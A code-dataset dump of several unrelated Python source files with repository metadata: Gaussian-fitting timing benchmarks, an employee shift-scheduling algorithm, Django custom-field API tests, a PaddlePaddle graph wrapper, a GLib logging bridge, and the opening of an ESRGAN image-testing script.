def mpfitter(xdata, ydata, params=None, error=None, model=gaussian, quiet=True, **kwargs):
"""
Find the least-squares fit using mpfit
"""
errfunc = error_function_generator(xdata,ydata,error=error,model=model,mpfit=True)
mp = mpfit(errfunc, params, quiet=quiet, **kwargs)
return mp.params,mp.perror
def lsfitter(xdata, ydata, params=None, error=None, model=gaussian):
"""
Find the least-squares fit using scipy.optimize.leastsq
"""
errfunc = error_function_generator(xdata,ydata,error=error,model=model)
p, cov, infodict, errmsg, success = leastsq(errfunc, params, full_output=1)
return p, cov.diagonal()**0.5
def annealfitter(xdata, ydata, params=None, error=None, model=gaussian):
"""
Find the fit using scipy.optimize.anneal
"""
errfunc = error_function_generator(xdata,ydata,error=error,model=model, sumsquares=True)
p = scipy.optimize.anneal(errfunc, params, full_output=1)
return p
def fminfitter(xdata, ydata, params=None, error=None, model=gaussian, disp=False):
"""
Find the fit using scipy.optimize.fmin
"""
errfunc = error_function_generator(xdata,ydata,error=error,model=model, sumsquares=True)
p = scipy.optimize.fmin(errfunc, params, full_output=1, disp=disp)
return p
if __name__ == "__main__":
#do some timing
length = 1000
xarr = np.linspace(-5,5,length)
yarr = gaussian(xarr, 0.75, -0.25, 2.2)
noise = np.random.randn(length) * 0.25
err = np.ones(length)*0.25
print mpfitter(xarr,yarr+noise,[1,0,1],err)
print lsfitter(xarr,yarr+noise,[1,0,1],err)
print annealfitter(xarr,yarr+noise,[1,0,1],err)
print fminfitter(xarr,yarr+noise,[1,0,1],err)
function_names = ['mpfitter','lsfitter','fminfitter']#,'annealfitter']
A,dx,s,n = 0.75,-0.25,2.2,0.25
nfits = 25
ntries = 7
print ("%18s" % "nelements")+"".join(["%18s" % fn for fn in function_names])
mins = {}
nels = (2e1,5e1,1e2,2e2,3e2,4e2,5e2,7.5e2,1e3,2.5e3,5e3,1e4,5e4,1e5)
for nelements in nels:
min_i = ["%18f" % (min(timeit.Timer("%s(xarr,yarr+noise,[1,0,1],err)" % (fn),
setup="from mpfit_vs_scipy import %s,gaussian; import numpy as np; xarr=np.linspace(-5,5,%i);\
yarr=gaussian(xarr,%f,%f,%f); noise=np.random.randn(%i);\
err = np.ones(%i)*%f" % (fn, nelements, A, dx, s, nelements, nelements, n)).repeat(ntries,nfits)))
for fn in function_names]
print "%17i:" % (int(nelements)) + "".join(min_i)
mins[nelements]=min_i
from pylab import *
mpmins = array([mins[n][0] for n in nels],dtype='float')
lsmins = array([mins[n][1] for n in nels],dtype='float')
fmmins = array([mins[n][2] for n in nels],dtype='float')
loglog(nels,mpmins,label='mpfit')
loglog(nels,lsmins,label='leastsq')
loglog(nels,fmmins,label='fmin')
xlabel("Number of Elements")
ylabel("Evaluation Time for %i fits (seconds)" % nfits)
legend(loc='best')
savefig("comparison_plot.png")
clf()
semilogx(nels,mpmins/lsmins,label='mpfit/leastsq')
semilogx(nels,fmmins/lsmins,label='fmin/leastsq')
xlabel("Number of Elements")
ylabel("Ratio to leastsq (which is generally the fastest)")
legend(loc='best')
savefig("time_ratio_plot.png")
| 31.528169
| 118
| 0.649542
|
4a0e8e3bebbf9b23526aabc95ae7bbcd0dbde3a0
| 6,359
|
py
|
Python
|
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | 1
|
2020-12-07T05:43:17.000Z
|
2020-12-07T05:43:17.000Z
|
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | null | null | null |
calculations.py
|
BenTimor/Sidur
|
2deb619b683043447d25abb6e0421a7cc5869b88
|
[
"MIT"
] | null | null | null |
from typing import List
from .schedule import *
from random import shuffle
from . import config
def embedding(schedule: Schedule, employees: List[Employee]):
"""
Embedding all of the employees into the schedule
:param schedule: The schedule
:param employees: The employees
"""
# Embedding the priorities from 5 to 2
for priority in range(5, 1, -1):
for day_number in range(len(schedule)):
day = schedule[day_number]
for shift in day:
# In the first run of every shift, set all the empty shifts of the employees to 3
if priority == 5:
set_shift_employees(shift, employees)
# Get & Shuffle employees with this priority
available_employees = priority_employees(shift, employees, priority)
shuffle(available_employees)
# If the priority is 5 we must embed the employees
if priority == 5:
for employee in available_employees:
embed_employee(shift, schedule, employee)
continue
# Check how many employees needed, if there are not needed, continue
employees_needed = shift.employees_needed - len(shift.employees)
while available_employees:
# If needed, add the employees
least_working = least_working_employees(available_employees)
# If we don't need any more employees, break
if employees_needed <= 0:
break
# If we have more than enough employees, add just the right amount
if len(least_working) >= employees_needed:
for employee in least_working[:employees_needed]:
embed_employee(shift, schedule, employee)
available_employees.remove(employee)
employees_needed -= 1
# If we don't have enough employees (in this run!), add all of them
else:
for employee in least_working:
embed_employee(shift, schedule, employee)
available_employees.remove(employee)
employees_needed -= 1
else:
# Check if we have enough employees
if priority == 2 and employees_needed > 0:
print(f"Not enough employees for day {day_number} / shift {shift.start}-{shift.end}")
def embed_employee(shift: Shift, schedule: Schedule, employee: Employee, past_check=False):
"""
Adding an employee into a shift
:param shift: The shift
:param schedule: All of the schedule
:param employee: The employee
:param past_check: If it's true, the function won't add the employee to any shift, it'll just set the past shifts in config.hours range to -1.
"""
if not past_check:
shift.append(employee)
# Setting the shift to -2 so he won't be embedded again
employee[shift] = -2
allowed = False
add = 0
past_check = -1 if past_check else 1 # Past check just blocking past shifts via config time, so he won't be working in config.time hours before shift
for day in schedule[::past_check]:
if allowed:
add += 24
same_day = False
for day_shift in day[::past_check]:
# Since the moment we pass on his shift, we'll check the rest of the shifts
if day_shift == shift:
allowed = True
same_day = True
continue
# If needed, disabling all shifts in the same day
if same_day and config.one_shift_per_day:
employee[day_shift] = -1
continue
if allowed:
# If the shift starts in less than X hours (from the config) he won't be able to be embedded into it
if shift.end < shift.start: # If the shift ends before it's started (for example, 18-02), we have to add 24 hours to the end because it the day after
if day_shift.start + add > shift.end + 24 + config.time_between_shifts:
return
else:
employee[day_shift] = -1
else:
if day_shift.start+add > shift.end+config.time_between_shifts:
return
else:
employee[day_shift] = -1
if not past_check:
embed_employee(shift, schedule, employee, True)
# You can't have shift with not priority. So we'll set every shift to 3.
def set_shift_employees(shift, employees: List[Employee]):
"""
Setting the priority of the shift to 3 if it doesn't have any priority
:param shift: The shift
:param employees: List of employees to set it on
"""
for employee in employees:
if shift not in employee:
employee[shift] = 3
def priority_employees(shift: Shift, employees: List[Employee], priority: int) -> List[Employee]:
"""
:param shift: What shift you want the employees to work at
:param employees: List of all of the employees you want to check
:param priority: What is the priority
:return: List of all of the employees which has this priority for the shift
"""
return [employee for employee in employees if employee[shift] == priority]
def least_working_employees(employees: List[Employee]) -> List[Employee]:
"""
:param employees: List of the employees to check
:return: The employees which work the least
"""
if not employees:
return []
available_employees = []
least = shifts_amount(employees[0])
for employee in employees:
shifts = shifts_amount(employee)
if shifts == least:
available_employees.append(employee)
if shifts < least:
least = shifts
available_employees = [employee]
return available_employees
def shifts_amount(employee: Employee) -> int:
"""
:param employee: The employee to check
:return: The amount of shifts that the employee has
"""
return len([v for v in employee.values() if v == -2])
| 39.993711
| 165
| 0.590344
|
4a0e8eda57315939710ecdb13175ce70149df7b0
| 7,365
|
py
|
Python
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 1
|
2018-10-05T17:03:01.000Z
|
2018-10-05T17:03:01.000Z
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 1
|
2017-01-06T19:20:32.000Z
|
2017-01-06T19:20:32.000Z
|
tests/ozpcenter_api/test_api_custom_field.py
|
emosher/ozp-backend
|
d31d00bb8a28a8d0c999813f616b398f41516244
|
[
"Apache-2.0"
] | 7
|
2016-12-16T15:42:05.000Z
|
2020-09-05T01:11:27.000Z
|
import pytest
from django.test import override_settings
from rest_framework import status
from ozpcenter.models import CustomField
from tests.cases import APITestCase, ModelAssertionsMixin
from tests.ozpcenter_api import fixtures
from ozpcenter.api.custom_field.model_access import get_custom_field_by_id
@pytest.mark.integration
@pytest.mark.fast
@override_settings(ES_ENABLED=False)
class CustomFieldApiTest(ModelAssertionsMixin,
APITestCase):
@classmethod
def setUpTestData(cls):
cls.aml_steward_profile = fixtures.create_steward()
cls.org_steward_profile = fixtures.create_org_steward()
cls.user_profile = fixtures.create_user_profile()
cls.type1 = fixtures.create_custom_field_type("Type 1", "Type 1", "text/html")
cls.type2 = fixtures.create_custom_field_type("JSON Type", "JSON", "application/json")
cls.field1 = fixtures.create_custom_field(cls.type1, 'Custom Field 1', 'Custom Field Label 1')
cls.field2 = fixtures.create_custom_field(cls.type1, 'Custom Field 2', 'Custom Field Label 2')
cls.field3 = fixtures.create_custom_field(cls.type1, 'Custom Field 2', 'Custom Field Label 2')
cls.fields_ordered = [cls.field1, cls.field2, cls.field3]
def setUp(self):
pass
def _list_custom_fields(self):
return self.client.get("/api/custom_field/", format="json")
def _get_custom_field(self, field_id):
return self.client.get("/api/custom_field/%s/" % field_id, format="json")
def _create_custom_field(self, data=None):
return self.client.post("/api/custom_field/", data, format="json")
def _update_custom_field(self, field_id, data=None):
return self.client.put("/api/custom_field/%s/" % field_id, data, format="json")
def _patch_custom_field(self, field_id, data=None):
return self.client.patch("/api/custom_field/%s/" % field_id, data, format="json")
def _delete_custom_field(self, field_id):
return self.client.delete("/api/custom_field/%s/" % field_id, format="json")
def test_list_custom_fields_user(self):
self.authenticate_as(self.user_profile)
response = self._list_custom_fields()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldsEqual(response.data, self.fields_ordered)
def test_list_custom_fields_org_steward(self):
self.authenticate_as(self.org_steward_profile)
response = self._list_custom_fields()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldsEqual(response.data, self.fields_ordered)
def test_list_custom_fields_aml_steward(self):
self.authenticate_as(self.aml_steward_profile)
response = self._list_custom_fields()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldsEqual(response.data, self.fields_ordered)
def test_get_custom_field_by_id_user(self):
self.authenticate_as(self.user_profile)
response = self._get_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldEqual(response.data, self.field1)
def test_get_custom_field_by_id_org_steward(self):
self.authenticate_as(self.org_steward_profile)
response = self._get_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldEqual(response.data, self.field1)
def test_get_custom_field_by_id_aml_steward(self):
self.authenticate_as(self.aml_steward_profile)
response = self._get_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldEqual(response.data, self.field1)
def test_create_custom_field_as_aml_steward(self):
self.authenticate_as(self.aml_steward_profile)
request = self._custom_field_create_request()
response = self._create_custom_field(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertCustomFieldEqual(response.data, request)
def test_create_custom_field_as_org_steward_unauthorized(self):
self.authenticate_as(self.org_steward_profile)
response = self._create_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_create_custom_field_as_user_unauthorized(self):
self.authenticate_as(self.user_profile)
response = self._create_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_custom_field_as_aml_steward(self):
self.authenticate_as(self.aml_steward_profile)
response = self._update_custom_field(self.field1.id, self._custom_field_update_request())
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertCustomFieldEqual(response.data, self._custom_field_update_request())
def test_update_custom_field_as_org_steward_unauthorized(self):
self.authenticate_as(self.org_steward_profile)
response = self._update_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_custom_field_as_user_unauthorized(self):
self.authenticate_as(self.user_profile)
response = self._update_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_custom_field_as_steward(self):
self.authenticate_as(self.aml_steward_profile)
response = self._delete_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
with self.assertRaises(CustomField.DoesNotExist):
get_custom_field_by_id(1, True)
def test_delete_custom_field_as_org_steward_unauthorized(self):
self.authenticate_as(self.org_steward_profile)
response = self._delete_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete_custom_field_as_user_unauthorized(self):
self.authenticate_as(self.user_profile)
response = self._delete_custom_field(self.field1.id)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def _custom_field_create_request(self):
return {
'display_name': 'Field 4',
'label': 'Custom Text Field',
'type': self.type1.id,
'section': 'Section',
'description': 'Description',
'tooltip': 'Tooltip',
'properties': 'Properties',
'is_required': False,
'admin_only': True,
'all_listing_types': False
}
def _custom_field_update_request(self):
return {
'id': self.field1.id,
'type': self.type2.id,
'display_name': 'New Field 1',
'label': 'New Field Label 1',
'section': 'Section',
'description': 'Description',
'tooltip': 'Tooltip',
'properties': 'Properties',
'is_required': False,
'admin_only': True,
'all_listing_types': False
}
| 37.385787
| 102
| 0.712559
|
4a0e8ef005ac34abcab87222f7c3cefc22b75de1
| 19,794
|
py
|
Python
|
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
Sand3r-/Paddle
|
1217a521554d63caa1381b8716910d0268dfc22d
|
[
"Apache-2.0"
] | 2
|
2017-05-15T06:52:18.000Z
|
2017-06-13T11:55:11.000Z
|
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
MaJun-cn/Paddle
|
0ec3a42e9740a5f5066053bb49a923d538eba24a
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/fluid/contrib/slim/graph/graph_wrapper.py
|
MaJun-cn/Paddle
|
0ec3a42e9740a5f5066053bb49a923d538eba24a
|
[
"Apache-2.0"
] | 4
|
2020-07-27T13:24:03.000Z
|
2020-08-06T08:20:32.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
from .... import io
from .... import compiler
from ....framework import Program
from ....framework import program_guard
from ....framework import Parameter
from ....framework import Variable
from ....executor import Executor
import copy
from collections import Iterable
from ....io import save_inference_model, load_inference_model, save_persistables
import numpy as np
import pickle
import os
__all__ = ['GraphWrapper', 'VarWrapper', 'OpWrapper']
OPTIMIZER_OPS = [
'momentum',
'lars_momentum',
'adagrad',
'adam',
'adamax',
'dpsgd',
'decayed_adagrad',
'adadelta',
'rmsprop',
]
class VarWrapper(object):
def __init__(self, var, graph):
assert isinstance(var, Variable)
assert isinstance(graph, GraphWrapper)
self._var = var
self._graph = graph
def __eq__(self, v):
"""
Overwrite this function for ...in... syntax in python.
"""
return self._var.name == v._var.name
def name(self):
"""
Get the name of the variable.
"""
return self._var.name
def shape(self):
"""
Get the shape of the variable.
"""
return self._var.shape
def set_shape(self, shape):
"""
Set the shape of the variable.
"""
self._var.desc.set_shape(shape)
def inputs(self):
"""
Get all the operators that use this variable as output.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_inputs():
ops.append(op)
return ops
def outputs(self):
"""
Get all the operators that use this variable as input.
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for op in self._graph.ops():
if self in op.all_outputs():
ops.append(op)
return ops
class OpWrapper(object):
def __init__(self, op, graph):
assert isinstance(graph, GraphWrapper)
self._op = op
self._graph = graph
def __eq__(self, op):
"""
Overwrite this function for ...in... syntax in python.
"""
return self.idx() == op.idx()
def all_inputs(self):
"""
Get all the input variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.input_arg_names
]
def all_outputs(self):
"""
Get all the output variables of this operator.
"""
return [
self._graph.var(var_name) for var_name in self._op.output_arg_names
]
def idx(self):
"""
Get the id of this operator.
"""
return self._op.idx
def type(self):
"""
Get the type of this operator.
"""
return self._op.type
def is_bwd_op(self):
"""
Whether this operator is backward op.
"""
return self.type().endswith('_grad')
def is_opt_op(self):
"""
Whether this operator is optimizer op.
"""
return self.type() in OPTIMIZER_OPS
def inputs(self, name):
"""
Get all the variables by the input name.
"""
return [self._graph.var(var_name) for var_name in self._op.input(name)]
def outputs(self, name):
"""
Get all the variables by the output name.
"""
return [self._graph.var(var_name) for var_name in self._op.output(name)]
def set_attr(self, key, value):
"""
Set the value of attribute by attribute's name.
Args:
key(str): the attribute name.
value(bool|int|str|float|list): the value of the attribute.
"""
self._op._set_attr(key, value)
def attr(self, name):
"""
Get the attribute by name.
Args:
name(str): the attribute name.
Returns:
bool|int|str|float|list: The attribute value. The return value
can be any valid attribute type.
"""
return self._op.attr(name)
class GraphWrapper(object):
"""
It is a wrapper of paddle.fluid.framework.IrGraph with some special functions
for paddle slim framework.
"""
def __init__(self, program=None, in_nodes=[], out_nodes=[]):
"""
Args:
program(framework.Program): A program with
in_nodes(dict): A dict to indicate the input nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
out_nodes(dict): A dict to indicate the input nodes of the graph.
The key is user-defined and human-readable name.
The value is the name of Variable.
"""
super(GraphWrapper, self).__init__()
self.program = Program() if program is None else program
self.persistables = {}
self.teacher_persistables = {}
for var in self.program.list_vars():
if var.persistable:
self.persistables[var.name] = var
self.compiled_graph = None
in_nodes = [] if in_nodes is None else in_nodes
out_nodes = [] if out_nodes is None else out_nodes
self.in_nodes = OrderedDict(in_nodes)
self.out_nodes = OrderedDict(out_nodes)
self._attrs = OrderedDict()
def all_parameters(self):
"""
Get all the parameters in this graph.
Returns:
list<VarWrapper>: A list of VarWrapper instances.
"""
params = []
for block in self.program.blocks:
for param in block.all_parameters():
params.append(VarWrapper(param, self))
return params
def is_parameter(self, var):
"""
Whether the given variable is parameter.
Args:
var(VarWrapper): The given variable.
"""
return isinstance(var._var, Parameter)
def is_persistable(self, var):
"""
Whether the given variable is persistable.
Args:
var(VarWrapper): The given variable.
"""
return var._var.persistable
def compile(self, for_parallel=True, for_test=False, mem_opt=False):
"""
Compile the program in this wrapper to framework.CompiledProgram for next running.
This function must be called if the program is modified.
Args:
for_parallel(bool): Whether the program to run in data parallel way. default: True.
for_test(bool): Whether the compiled program is used for test.
"""
target = self.program
if for_test:
loss = None
else:
loss = self.out_nodes['loss']
if for_parallel:
# disable memory optimize for stable training
build_strategy = compiler.BuildStrategy()
build_strategy.enable_inplace = mem_opt
build_strategy.memory_optimize = mem_opt
build_strategy.fuse_all_reduce_ops = False
# build_strategy.async_mode = False
self.compiled_graph = compiler.CompiledProgram(
target).with_data_parallel(
loss_name=loss, build_strategy=build_strategy)
else:
self.compiled_graph = compiler.CompiledProgram(target)
def ops(self):
"""
Return all operator nodes included in the graph as a set.
"""
ops = []
for block in self.program.blocks:
for op in block.ops:
ops.append(OpWrapper(op, self))
return ops
def vars(self):
"""
Get all the variables.
"""
return [VarWrapper(var, self) for var in self.program.list_vars()]
def var(self, name):
"""
Get the variable by variable name.
"""
return VarWrapper(self.program.global_block().var(name), self)
def clone(self, for_test=False):
"""
Clone a new graph from current graph.
Returns:
(GraphWrapper): The wrapper of a new graph.
"""
return GraphWrapper(
self.program.clone(for_test),
copy.deepcopy(self.in_nodes), copy.deepcopy(self.out_nodes))
def merge(self, graph):
"""
Merge a graph into current graph.
Args:
graph(GraphWrapper): The graph to be merged by current graph.
"""
for var in graph.program.list_vars():
if var.persistable:
self.teacher_persistables[var.name] = var
new_var = self.program.global_block()._clone_variable(
var, force_persistable=False)
new_var.stop_gradient = var.stop_gradient
# TODO: parameters should be cloned
for op in graph.ops():
op = op._op
inputs = {}
outputs = {}
attrs = {}
for input_name in op.input_names:
inputs[input_name] = [
self.var(in_var_name)._var
for in_var_name in op.input(input_name)
]
for output_name in op.output_names:
outputs[output_name] = [
self.var(out_var_name)._var
for out_var_name in op.output(output_name)
]
for attr_name in op.attr_names:
attrs[attr_name] = op.attr(attr_name)
self.program.global_block().append_op(
type=op.type, inputs=inputs, outputs=outputs, attrs=attrs)
def program(self):
"""
Get the program in current wrapper.
"""
return self.program
def pre_ops(self, op):
"""
Get all the previous operators of target operator.
Args:
op(OpWrapper): Target operator..
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for in_var in op.all_inputs():
if in_var in p.all_outputs():
ops.append(p)
return ops
def next_ops(self, op):
"""
Get all the next operators of target operator.
Args:
op(OpWrapper): Target operator..
Returns:
list<OpWrapper>: A list of operators.
"""
ops = []
for p in self.ops():
for out_var in op.all_outputs():
if out_var in p.all_inputs():
ops.append(p)
return ops
def get_param_by_op(self, op):
"""
Get the parameters used by target operator.
"""
assert isinstance(op, OpWrapper)
params = []
for var in op.all_inputs():
if isinstance(var._var, Parameter):
params.append(var)
assert len(params) > 0
return params
def numel_params(self):
"""
Get the number of elements in all parameters.
"""
ret = 0
for param in self.all_parameters():
ret += np.product(param.shape())
return ret
def get_optimize_graph(self, optimizer, place, scope, no_grad_var_names=[]):
"""
Get a new graph for training by appending some backward operators and optimization operators.
Args:
optimizer: The optimizer used to generate training graph.
place: The place to run the graph.
scope: The scope used to run the graph. Some new variable will be added into this scope.
no_grad_var_names(list<str>): Names of variables that should be ignored while computing gradients. default: [].
Returns:
(GraphWrapper): The wrapper of new graph with backward ops and optimization ops.
"""
graph = self.clone()
startup_program = Program()
with program_guard(
main_program=graph.program, startup_program=startup_program):
target_name = None
if 'loss' in graph.out_nodes:
target_name = graph.out_nodes['loss']
elif 'cost' in graph.out_nodes:
target_name = graph.out_nodes['cost']
else:
return None
target = graph.var(target_name)._var
# The learning rate variable may be created in other program.
# Update information in optimizer to make
# learning rate variable being accessible in current program.
if isinstance(optimizer._learning_rate, Variable):
optimizer._learning_rate_map[
graph.program] = optimizer._learning_rate
optimizer.minimize(target, no_grad_set=no_grad_var_names)
exe = Executor(place)
exe.run(program=startup_program, scope=scope)
return graph
def flops(self, only_conv=False):
"""
Get the flops of current graph.
Args:
only_conv: Only calculating the conv layers. default: False.
Returns:
int: The flops of current graph.
"""
flops = 0
for op in self.ops():
if op.type() in ['conv2d', 'depthwise_conv2d']:
filter_shape = op.inputs("Filter")[0].shape()
input_shape = op.inputs("Input")[0].shape()
output_shape = op.outputs("Output")[0].shape()
c_out, c_in, k_h, k_w = filter_shape
_, _, h_out, w_out = output_shape
groups = op.attr("groups")
kernel_ops = k_h * k_w * (c_in / groups)
if len(op.inputs("Bias")) > 0:
with_bias = 1
else:
with_bias = 0
flops += 2 * h_out * w_out * c_out * (kernel_ops + with_bias)
elif op.type() == 'pool2d' and not only_conv:
input_shape = op.inputs("X")[0].shape()
output_shape = op.outputs("Out")[0].shape()
_, c_out, h_out, w_out = output_shape
k_size = op.attr("ksize")
flops += h_out * w_out * c_out * (k_size[0]**2)
elif op.type() == 'mul' and not only_conv:
x_shape = list(op.inputs("X")[0].shape())
y_shape = op.inputs("Y")[0].shape()
if x_shape[0] == -1:
x_shape[0] = 1
flops += 2 * x_shape[0] * x_shape[1] * y_shape[1]
elif op.type() in ['relu', 'sigmoid', 'batch_norm'
] and not only_conv:
input_shape = list(op.inputs("X")[0].shape())
if input_shape[0] == -1:
input_shape[0] = 1
flops += np.product(input_shape)
return flops
def save_model(self, path, exe):
"""
Save network and parameters into file which can be load by load_inference_model api.
Args:
path(str): The path to save the persistables.
exe(framework.Executor): The executor used to save the persistables.
"""
out_vars = [
self.var(var_name)._var for var_name in self.out_nodes.values()
]
in_vars = list(self.in_nodes.values())
assert (len(in_vars) > 0)
assert (len(out_vars) > 0)
io.save_inference_model(
path,
in_vars,
out_vars,
exe.exe,
model_filename="__model__",
params_filename="__params__",
main_program=self.program.clone(),
export_for_deployment=True)
def save_infer_model(self, path, exe, in_out, program_only=False):
"""
Save network and parameters into file which can be load by load_inference_model api.
Args:
path(str): The path to save the persistables.
exe(framework.Executor): The executor used to save the persistables.
in_out(tuple|list): in_out[0] is a list of input nodes' names
and in_out[1] is a list of output nodes' names.
program_only(bool): Whether to save program only.
"""
out_vars = [self.var(var_name)._var for var_name in in_out[1]]
in_vars = list(in_out[0])
assert (len(in_vars) > 0)
assert (len(out_vars) > 0)
io.save_inference_model(
path,
in_vars,
out_vars,
exe.exe,
model_filename="__model__.infer",
params_filename="__params__",
program_only=program_only,
main_program=self.program.clone(),
export_for_deployment=True)
def save_persistables(self, path, exe):
"""
Save all the persistable variables into file.
Args:
path(str): The path to save the persistables.
exe(framework.Executor): The executor used to save the persistables.
"""
# update persistables from program
for var in self.program.list_vars():
if var.persistable and var.name not in self.persistables:
self.persistables[var.name] = var
persistables = []
for var in self.persistables:
if 'reader' not in var and 'double_buffer' not in var and var not in self.teacher_persistables:
persistables.append(self.persistables[var])
io.save_vars(exe.exe, path, vars=persistables)
def load_persistables(self, path, exe):
"""
Load the persistable variables from file.
Args:
path(str): The path to load the persistables.
exe(framework.Executor): The executor used to load the persistables.
"""
def if_exist(var):
return os.path.exists(os.path.join(path, var.name))
persistables = []
for var in self.persistables:
if 'reader' not in var and 'double_buffer' not in var:
persistables.append(self.persistables[var])
io.load_vars(exe.exe, path, vars=persistables, predicate=if_exist)
def update_param_shape(self, scope):
"""
Update the shape of parameters in the graph according to tensors in scope.
It is used after loading pruned parameters from file.
"""
for param in self.all_parameters():
tensor_shape = np.array(scope.find_var(param.name()).get_tensor(
)).shape
param.set_shape(tensor_shape)
def infer_shape(self):
"""
Update the groups of convolution layer according to current filters.
It is used after loading pruned parameters from file.
"""
for op in self.ops():
if op.type() != 'conditional_block':
op._op.desc.infer_shape(op._op.block.desc)
def update_groups_of_conv(self):
for op in self.ops():
if op.type() == 'depthwise_conv2d' or op.type(
) == 'depthwise_conv2d_grad':
op.set_attr('groups', op.inputs('Filter')[0].shape()[0])
| 33.893836
| 123
| 0.566535
|
4a0e9050abe9ad6bb92a44d0cb025ee7289a679e
| 1,042
|
py
|
Python
|
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | 1
|
2020-05-29T10:14:41.000Z
|
2020-05-29T10:14:41.000Z
|
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | null | null | null |
cobang/logging.py
|
php1301/CoBang
|
b1c7f1fb72233c58dca5b10084939a528c4cb61c
|
[
"Apache-2.0"
] | null | null | null |
import gi
import logbook
from logbook.handlers import Handler, StringFormatterHandlerMixin
gi.require_version('GLib', '2.0')
from gi.repository import GLib
from .consts import SHORT_NAME
LOGBOOK_LEVEL_TO_GLIB = {
logbook.DEBUG: GLib.LogLevelFlags.LEVEL_DEBUG,
logbook.INFO: GLib.LogLevelFlags.LEVEL_INFO,
logbook.WARNING: GLib.LogLevelFlags.LEVEL_WARNING,
# For Error level, we translate to GLib Critical, instead of Error, because the later causes crash
logbook.ERROR: GLib.LogLevelFlags.LEVEL_CRITICAL,
}
def _log(level: GLib.LogLevelFlags, message: str):
variant_message = GLib.Variant('s', message)
variant_dict = GLib.Variant('a{sv}', {
'MESSAGE': variant_message,
})
GLib.log_variant(SHORT_NAME, level, variant_dict)
# Logbook custom handler to redirect message to GLib log
class GLibLogHandler(Handler, StringFormatterHandlerMixin):
def emit(self, record):
message = self.format(record)
level = LOGBOOK_LEVEL_TO_GLIB[record.level]
_log(level, message)
| 28.162162
| 102
| 0.742802
|
4a0e91274f286a29dfd4ab19a5fe02704bc41a19
| 5,226
|
py
|
Python
|
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | 1
|
2021-05-27T06:41:43.000Z
|
2021-05-27T06:41:43.000Z
|
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | null | null | null |
test_image.py
|
tian961214/RFB_ESRGAN-PyTorch
|
0104e8e9b172065e94ac07bf65d9bb9a1898425e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Dakewe Biotech Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import logging
import os
import random
import torch
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import torchvision.transforms as transforms
import torchvision.utils as vutils
from PIL import Image
from torchvision.transforms import InterpolationMode
import rfb_esrgan_pytorch.models as models
from rfb_esrgan_pytorch.utils.common import configure
from rfb_esrgan_pytorch.utils.common import create_folder
from rfb_esrgan_pytorch.utils.estimate import iqa
from rfb_esrgan_pytorch.utils.transform import process_image
model_names = sorted(name for name in models.__dict__ if name.islower() and not name.startswith("__") and callable(models.__dict__[name]))
logger = logging.getLogger(__name__)
logging.basicConfig(format="[ %(levelname)s ] %(message)s", level=logging.INFO)
parser = argparse.ArgumentParser(description="Perceptual Extreme Super Resolution Network with Receptive Field Block.")
parser.add_argument("--lr", type=str, required=True,
